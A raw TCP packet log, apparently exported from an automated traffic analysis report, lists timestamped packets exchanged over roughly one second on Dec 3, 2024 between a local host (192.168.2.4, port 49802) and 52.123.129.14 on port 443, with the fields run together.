                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.584903955 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.586833954 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.586895943 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.586903095 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.589158058 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.589224100 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.589230061 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.592211008 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.592294931 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.592300892 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.594738007 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.594800949 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.594806910 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.596129894 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.596188068 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.596194983 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.602396011 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.602490902 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.602498055 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.603081942 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.603135109 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.603142023 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.605792999 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.605858088 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.605864048 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.655889034 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.768558025 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.768570900 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.768651009 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.768672943 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.771465063 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.771471977 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.771523952 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.771538973 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.774379015 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.774415970 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.774446964 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.774456978 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.774485111 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.777065039 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.777141094 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.777153015 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.780108929 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.780196905 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.780210972 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.781898022 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.781975985 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.781986952 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.784269094 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.784334898 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.784343958 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.788151026 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.788212061 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.788218975 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.791276932 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.791363001 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.791372061 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.793592930 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.793653011 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.793659925 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.795187950 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.795243979 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.795253038 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.798296928 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.798355103 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.798362017 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.800622940 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.800681114 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.800689936 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.802242041 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.802315950 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.802323103 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.806085110 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.806152105 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.806159973 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.808147907 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.808218956 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.808227062 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.853893042 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.970383883 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.970391035 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.970467091 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.970479965 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.972383022 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.972419024 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.972465038 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.972470999 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.972495079 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.975148916 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.975219011 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.975229025 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.977277040 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.977349043 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.977356911 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.979734898 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.979800940 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.979809999 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.982266903 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.982337952 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.982346058 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.984302044 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.984358072 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.984365940 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.986763000 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.986839056 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.986849070 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.989211082 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.989286900 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.989295006 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.991664886 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.991731882 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.991739035 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.994220972 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.994288921 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.994296074 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.995943069 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.996005058 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.996012926 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.998990059 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.999058008 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:26.999067068 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.000812054 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.000880957 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.000888109 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.003320932 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.003396034 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.003403902 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.011452913 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.011538982 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.011548042 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.058263063 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.172691107 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.172698975 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.172765970 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.172791958 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.175163031 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.175170898 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.175235033 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.175242901 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.177642107 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.177668095 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.177700043 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.177706003 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.177721024 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.179455996 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.179522038 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.179528952 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.182578087 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.182641029 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.182651043 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.184726954 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.184787989 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.184794903 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.186789989 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.186851978 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.186861038 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.189707994 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.189775944 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.189785004 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.191804886 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.191896915 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.191907883 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.194776058 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.194835901 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.194843054 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.196710110 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.196774960 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.196782112 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.199126005 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.199192047 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.199203968 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.201222897 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.201292992 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.201301098 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.203320980 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.203418970 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.203425884 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.206103086 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.206173897 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.206182003 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.213080883 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.213154078 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.213160992 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.258307934 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.375850916 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.375859976 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.375955105 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.375984907 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.378135920 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.378185034 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.378218889 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.378223896 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.378268957 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.380772114 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.380851984 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.380858898 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.382394075 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.382462978 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.382471085 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.385194063 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.385263920 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.385272980 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.387727022 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.387809992 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.387818098 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.389394999 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.389461040 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.389467001 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.392231941 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.392294884 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.392302990 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.394309044 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.394366980 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.394375086 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.396435022 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.396505117 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.396512985 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.398895025 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.398973942 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.398983002 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.401840925 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.401912928 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.401920080 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.403897047 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.403955936 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.403964996 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.406029940 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.406089067 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.406096935 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.408783913 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.408844948 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.408852100 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.417330027 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.417414904 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.417423010 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.458551884 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.577322960 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.577331066 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.577411890 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.577436924 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.579653978 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.579687119 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.579735994 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.579742908 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.579763889 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.581902027 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.581960917 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.581971884 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.584640026 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.584690094 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.584697008 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.586684942 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.586744070 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.586751938 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.588886976 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.588958979 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.588964939 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.591741085 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.591852903 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.591859102 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.593764067 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.593827009 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.593833923 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:27.595956087 CET4434980252.123.129.14192.168.2.4
